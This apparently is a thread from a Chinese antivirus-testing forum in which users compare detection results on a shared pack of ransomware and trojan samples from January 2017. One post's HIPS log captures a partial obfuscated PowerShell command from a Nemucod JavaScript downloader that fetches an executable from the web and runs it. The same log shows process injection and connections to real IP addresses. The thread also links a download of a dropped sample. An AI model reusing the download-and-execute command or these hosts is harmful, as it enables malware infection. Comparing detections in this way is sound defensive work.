收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 缉毒卫队测试包 第三期 20170119
123456下一页
返回列表 发新帖
楼主: 神龟Turmi
 收起左侧

[病毒样本] 缉毒卫队测试包 第三期 20170119

  [复制链接]
skycai
发表于 2017-1-20 08:56:18 | 显示全部楼层
本帖最后由 skycai 于 2017-1-20 09:13 编辑
yhG{过}F{滤}Wly007 发表于 2017-1-20 07:55
火绒日志:

病毒库:2017/01/19 18:28


我这里检测的结果和你不一样,比你多了一个。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

BE_HC
发表于 2017-1-20 09:07:48 | 显示全部楼层
本帖最后由 BE_HC 于 2017-1-20 09:18 编辑

AVG扫描KILL 6X 剩02 04 05 07
HIPS表示04好像有写入MBR的行为(没复制)
04衍生物:链接: http://pan.baidu.com/s/1o8hQg6A 密码: fuwy
[mw_shl_code=css,true]"外壳扩展扫描(Shell Extension Scan)"
"高严重性";"6";"0";"6"
"已扫描:";"C:\Documents and Settings\Administrator\桌面\新建文件夹"
"已启动:";"2017-1-20, 8:18:48"
"已完成:";"2017-1-20, 8:18:49"
"项目数:";"33"
"启动者:";"Administrator"

"名称";"说明";"状态";"状态";"优先级"
"C:\Documents and Settings\Administrator\桌面\新建文件夹\sl170119-06-Ransom.Cerber.exe#infected";"特洛伊木马 Generic16_c.CHZH";"未解决";"未解决";"高"
"C:\Documents and Settings\Administrator\桌面\新建文件夹\sl170119-01-Ransom.Cerber.exe#infected";"特洛伊木马 Crypt6.COGM";"未解决";"未解决";"高"
"C:\Documents and Settings\Administrator\桌面\新建文件夹\sl170119-10-Ransom.Locky.exe#infected";"特洛伊木马 Generic38.AJMI";"未解决";"未解决";"高"
"C:\Documents and Settings\Administrator\桌面\新建文件夹\sl170119-03-Ransom&Downloader.Cerber.js#infected";"发现病毒 JS/Downloader.Agent.67_G";"未解决";"未解决";"高"
"C:\Documents and Settings\Administrator\桌面\新建文件夹\sl170119-08-Ransom.Locky.exe#infected";"特洛伊木马 Generic16_c.CHQR";"未解决";"未解决";"高"
"C:\Documents and Settings\Administrator\桌面\新建文件夹\sl170119-09-Trojan.Hostwack.exe#infected";"特洛伊木马 MSIL11.KVE";"未解决";"未解决";"高"

-------------------------------------------
HIPS(仅测试AVG漏的)
样本(2)
2017/1/20 08:33:21    创建新进程    允许
进程: c:\windows\explorer.exe
目标: c:\windows\system32\wscript.exe
命令行: "C:\Windows\System32\WScript.exe" "C:\Users\HSMG\Desktop\新建文件夹\sl170119-02-Downloader.Nemucod.js"
规则: [应用程序]*

2017/1/20 08:33:23    创建新进程    允许
进程: c:\windows\system32\wscript.exe
目标: c:\windows\system32\cmd.exe
命令行: "C:\Windows\System32\cmd.exe" /c "powershell  $sbyryr='^ent/plugins/ur';$ligud='^Set-ExecutionP';$iwej='^emp+''idijas.e';$gypa='^Scope  Process;';$yrjabli='^nloadFile(''htt';$ydhujsa='^ct    System.Net.';$eryz='^p://www.studio';$ubcaji='^ $path=($env:t';$nlog
规则: [应用程序]*

2017/1/20 08:33:25    创建新进程    允许
进程: c:\windows\system32\csrss.exe
目标: c:\windows\system32\conhost.exe
命令行: \??\C:\Windows\system32\conhost.exe
规则: [应用程序]*

2017/1/20 08:33:31    创建新进程    允许
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\windowspowershell\v1.0\powershell.exe
命令行: powershell   $sbyryr='ent/plugins/ur';$ligud='Set-ExecutionP';$iwej='emp+''idijas.e';$gypa='Scope  Process;';$yrjabli='nloadFile(''htt';$ydhujsa='ct    System.Net.';$eryz='p://www.studio';$ubcaji=' $path=($env:t';$nloge='rocess $path';$rutic='path); Start-P';
规则: [应用程序]*

2017/1/20 08:33:54    创建文件    允许
进程: c:\windows\system32\windowspowershell\v1.0\powershell.exe
目标: C:\Users\HSMG\AppData\Local\Tempidijas.exe
规则: [文件组]所有执行文件 -> [文件]*; *.exe

2017/1/20 08:34:08    修改其他进程的线程    允许
进程: c:\windows\system32\services.exe
目标: c:\windows\system32\windowspowershell\v1.0\powershell.exe
规则: [应用程序]c:\windows\system32\services.exe

2017/1/20 08:34:09    访问网络    允许
进程: c:\windows\system32\windowspowershell\v1.0\powershell.exe
目标: TCP [本机 : 49173] ->  [62.149.142.206 : 80 (http)]
规则: [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]

2017/1/20 08:34:14    创建新进程    允许
进程: c:\windows\system32\windowspowershell\v1.0\powershell.exe
目标: c:\windows\system32\ntvdm.exe
命令行: "C:\Windows\system32\ntvdm.exe" -i1  
规则: [应用程序]*

2017/1/20 08:34:16    创建新进程    允许
进程: c:\windows\system32\csrss.exe
目标: c:\windows\system32\conhost.exe
命令行: \??\C:\Windows\system32\conhost.exe
规则: [应用程序]*

2017/1/20 08:34:32    创建文件    允许
进程: c:\windows\system32\ntvdm.exe
目标: C:\MSDOS.SYS
规则: [文件]?:\

2017/1/20 08:34:48    创建文件    允许
进程: c:\windows\system32\ntvdm.exe
目标: C:\IO.SYS
规则: [文件]?:\

样本(5)
2017/1/20 08:48:50        c:\users\hsmg\desktop\新建文件夹\sl170119-05-backdoor.drixed.exe        修改其他进程的线程 (13)        c:\windows\system32\svchost.exe        允许        [应用程序]*       
2017/1/20 08:48:56        c:\users\hsmg\desktop\新建文件夹\sl170119-05-backdoor.drixed.exe        修改其他进程的内存        c:\windows\system32\svchost.exe        允许        [应用程序]*       
2017/1/20 08:49:00        c:\users\hsmg\desktop\新建文件夹\sl170119-05-backdoor.drixed.exe        从其他进程复制句柄        c:\windows\system32\svchost.exe        允许        [应用程序]*        句柄: (Event) 0x00000024
2017/1/20 08:49:06        c:\windows\system32\svchost.exe        删除文件        C:\Users\HSMG\Desktop\新建文件夹\sl170119-05-Backdoor.Drixed.exe        允许        [文件组]所有执行文件 -> [文件]*; *.exe       
2017/1/20 08:49:15        c:\windows\system32\searchindexer.exe        创建新进程        c:\windows\system32\searchfilterhost.exe        允许        [应用程序]*        命令行: "C:\Windows\system32\SearchFilterHost.exe" 0 520 524 532 65536 528
2017/1/20 08:49:18        c:\windows\system32\services.exe        修改其他进程的线程        c:\windows\system32\svchost.exe        允许        [应用程序]c:\windows\system32\services.exe       
2017/1/20 08:49:19        c:\windows\system32\searchindexer.exe        修改其他进程        c:\windows\system32\searchfilterhost.exe        允许        [应用程序]*       
2017/1/20 08:49:21        c:\windows\system32\svchost.exe        访问网络        TCP [本机 : 49175] ->  [23.94.38.151 : 4431]        允许        [网络]任意协议 [本机 : 任意端口] <-> [任意地址 : 任意端口]        [/mw_shl_code]
回复

举报

轩夏
发表于 2017-1-20 09:38:40 | 显示全部楼层
MSE
C:\Users\MSI\Desktop\2017.1.19\sl170119-08-Ransom.Locky.exe#infected
Infected: TrojanSpy:Win32/Ursnif.HP!bit
C:\Users\MSI\Desktop\2017.1.19\sl170119-09-Trojan.Hostwack.exe#infected
Infected: Trojan:Win32/Xtrat
回复

举报

ysj963
发表于 2017-1-20 09:54:25 | 显示全部楼层
fireherman 发表于 2017-1-19 23:12
5个启发B杀?

什么是B杀?
回复

举报

XZ8SM7Sx0bVkoUV
发表于 2017-1-20 09:54:42 | 显示全部楼层
skycai 发表于 2017-1-20 08:56
我这里检测的结果和你不一样,比你多了一个。

我也是4x
回复

举报

skycai
发表于 2017-1-20 10:00:34 | 显示全部楼层
XZ8SM7Sx0bVkoUV 发表于 2017-1-20 09:54
我也是4x

为避免扫描中某个文件卡顿卡死。火绒在虚拟机和脱壳方面有个时间限制。
比如可能一个文件只扫描0.X秒。
这样在虚拟机或者配置较差的电脑上,和配置好的电脑,扫描结果有可能不一样。
回复

举报

skycai
发表于 2017-1-20 10:11:42 | 显示全部楼层
INnoVation 发表于 2017-1-19 23:49
百度杀毒扫描日志

扫描信息

现在是5个,另外,慧眼的报毒都变成cav了。
估计从启发到云端结果分析。
回复

举报

神迹般存在
发表于 2017-1-20 11:24:24 | 显示全部楼层
NS 7x
剩余样本号:2、3、7

已上报

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

Sailer.X 该用户已被删除
发表于 2017-1-20 11:42:08 | 显示全部楼层
BDTS2017:
监控杀7X,剩余02,03,07
双击,BD全部拦截下载。
回复

举报

dongwenqi
发表于 2017-1-20 13:04:24 | 显示全部楼层
westbyte 发表于 2017-1-19 23:17
磕巴吃鸡解压杀了6个

Hello,

This files are already detected. Please update your bases:
sl170119-01-Ransom.Cerber.exe#infected - Trojan-Ransom.Win32.Zerber.bdns
sl170119-04-PUP.Startpage.exe#infected - Trojan-Ransom.Win32.Zerber.bdna
sl170119-05-Backdoor.Drixed.exe#infected - Trojan-Banker.Win32.CoreBot.cm
sl170119-06-Ransom.Cerber.exe#infected - Trojan-Ransom.Win32.Zerber.bdjy
sl170119-07-OfficeVBA.Generic.doc#infected - HEUR:Trojan.Script.Agent.gen
sl170119-08-Ransom.Locky.exe#infected - Trojan.Win32.Razy.gfu
sl170119-09-Trojan.Hostwack.exe#infected - Trojan.MSIL.Disfa.kpgn
sl170119-10-Ransom.Locky.exe#infected - Trojan-Ransom.Win32.Agent.aabc

Malicious application was detected in files. Its detection will be included in the next update 20/01/20添加到日历17 11:21:42:
sl170119-02-Downloader.Nemucod.js#infected - Trojan-Downloader.JS.Agent.nmy
sl170119-03-Ransom&Downloader.Cerber.js#infected - HEUR:Trojan.Script.Agent.gen
回复

举报

下一页 »
123456下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-19 07:33 , Processed in 0.097361 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表